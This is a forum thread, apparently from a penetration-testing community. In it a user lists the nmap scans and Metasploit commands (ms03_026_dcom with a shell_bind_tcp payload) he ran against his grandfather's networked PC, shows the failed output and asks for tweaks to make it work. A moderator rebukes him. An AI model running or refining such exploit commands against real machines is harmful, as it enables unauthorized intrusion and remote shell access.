Results 1 to 2 of 2

Thread: Metasploit Question - ms03_026_dcom - shell_bind_tcp

  1. #1
    Junior Member
    Join Date
    Mar 2008
    Posts
    94

    Question Metasploit Question - ms03_026_dcom - shell_bind_tcp

    Alright. I finally had some free time today. My grandfather wanted me put some work into a project that I have been working on for his company. (A inventory Access database). Usually I just go into his office, (He always leaves his computer logged on) and copy it to a flash drive and move it over to my XP box and do the work.

    But today i was tired and feeling very lazy lol. I wanted to send it over the network. To my dismay I haven't set up any type of SMB shares or a SFTP/SCP system like I have done at my house (I SFTP my files over the internet when I need something). So I started thinking..."What's another way I could pull it over over the network...?" And then it hit me! Hack it! (Maybe not the most conventional method).

    After doing a lil research I figured out that I assume Metasploit would be the answer. I've never worked with Metasploit before, so I thought this would be a good and worth while opportunity. I told my grandfather what i was planning and he said "Fine, but if you break anything, you better fix it by the time I need to get on there again." That's what he says about everything lol.

    After googling my eyes out and making notes in notepad. I downloaded Metasploit and updated it. (version 3.4.2). I'm not really sure what i'm doing and kinda playing it by ear, if anyone has any improvements, please speak up.

    My specs: I'm running a wireless Windows XP SP3 fully patched box with Firewall off for testing. Hes running a wired Windows XP SP3 box with Firewall on and eh...maybe updates a week or so old (i think Automatic Windows Update is enabled). We are the only computers on the network. (maybe a VM occasionally) our IP scheme is 192.168.1.1/24. The router is a old 100Mbit 802.11b Linksys running Standard Linksys firmware. Internet is a dynamic IP Comcast cable modem (cheapest plan).

    I made sure he was on the network and brought up my rough notes and got to work.

    I loaded up Windows and a Command Prompt and ran nmap and did a:

    Code:
    nmap -sP 192.168.1.1/24
    this produced the 3 hosts.
    - Me (192.168.1.100)
    - Mr. Linksys Router (192.168.1.1)
    - Grandfathers Computer (192.168.1.102)
    (Not sure what happened to 192.168.1.101)


    I did a ipconfig in another window and confirmed my IP (192.168.1.100). Alright sounds like 192.168.1.102 is my target. Then I decided to do a port scan:

    Code:
    nmap -sT 192.168.1.102
    It said that:
    - 999 filtered port
    - 139/tcp - open - netbios-ssn


    Ok. I think I have enough information for the attack. The IP and a Port to attack. I think thats the info I need?

    I fired up Metasploit and started to run commands. The most popular exploit i could find in the hour or so of searching was the RPC DCOM exploit. It says XP comptable so I decided to try it:

    Code:
    use exploit/windows/dcerpc/ms03_026_dcom
    It took it ok. Good. Then I ran the next command:

    Code:
    show options
    It said I need to set 2 properties, RHOST for host and RPORT for port. I got this info using nmap. I set these 2 values:

    Code:
    set RHOST 192.168.1.102
    set RPORT 139
    Im not sure for a payload...I picked a popular one i read about randomly:

    Code:
    set PAYLOAD windows/shell_bind_tcp
    I tried check but it says it was not supported...oh well.

    I ran another nmap scan to make sure everything was still the same, it was.

    Then I launched the exploit.

    Code:
    exploit
    And got some interesting feed back:

    [*] Started bind handler[*] trying target Windows NT SP3-6a/2000/XP/2003 Universal...[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:1.1@ncacn_ip_tcp:192.168.1.102[139] ...
    [-] Exploit exception: Invalid packet. DCERPC response packet is incomplete[*] Exploit completed, but no session was created.


    I'm guessing it did not work??? Does that mean his computer is patched? Or did I do something wrong? is there any tweaks that would make it work?

    I'm going to research it a bit more and maybe play with different payloads. I'm guessing his system is patched. It was a fun experiment, but in the end...back to the flash drive.

    I figure, progress was made, i figured out what does not work.
    QUOTE=cybrsnpr;118082]I think you have the right idea, but I also think you are really trying to kill a gnat with a small nuclear device!

  2. #2
    Super Moderator Archangel-Amael's Avatar
    Join Date
    Jan 2010
    Location
    Somewhere
    Posts
    8,012

    Default Re: Metasploit Question - ms03_026_dcom - shell_bind_tcp

    Quote Originally Posted by >Dart> View Post
    My grandfather wanted me put some work into a project that I have been working on for his company. (A inventory Access database). Usually I just go into his office, (He always leaves his computer logged on) and copy it to a flash drive and move it over to my XP box and do the work.
    But today i was tired and feeling very lazy lol. I wanted to send it over the network. To my dismay I haven't set up any type of SMB shares or a SFTP/SCP system like I have done at my house (I SFTP my files over the internet when I need something). So I started thinking..."What's another way I could pull it over over the network...?" And then it hit me! Hack it! (Maybe not the most conventional method).
    After doing a lil research I figured out that I assume Metasploit would be the answer. I've never worked with Metasploit before, so I thought this would be a good and worth while opportunity. I told my grandfather what i was planning and he said "Fine, but if you break anything, you better fix it by the time I need to get on there again." That's what he says about everything lol.
    After googling my eyes out and making notes in notepad. I downloaded Metasploit and updated it. (version 3.4.2). I'm not really sure what i'm doing and kinda playing it by ear, if anyone has any improvements, please speak up.


    I mean really? You have been here long enough to know the rules, and the types of posts we tolerate. It looks to me like you should leave grand-pa's computer alone. I mean "That's what he says about everything lol", come on man.

    Not only that, but there is no need to download metasploit since it is already included in BT and we don't support your OS here.
    To be successful here you should read all of the following.
    ForumRules
    ForumFAQ
    If you are new to Back|Track
    Back|Track Wiki
    Failure to do so will probably get your threads deleted or worse.

Similar Threads

  1. Replies: 3
    Last Post: 10-24-2010, 10:22 PM
  2. metasploit question
    By imported_apprentice in forum OLD Newbie Area
    Replies: 13
    Last Post: 09-03-2009, 04:27 AM
  3. Metasploit question
    By phoenix910 in forum OLD Pentesting
    Replies: 14
    Last Post: 08-08-2009, 09:33 PM
  4. metasploit question
    By DtL666 in forum OLD Newbie Area
    Replies: 11
    Last Post: 08-04-2009, 09:43 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •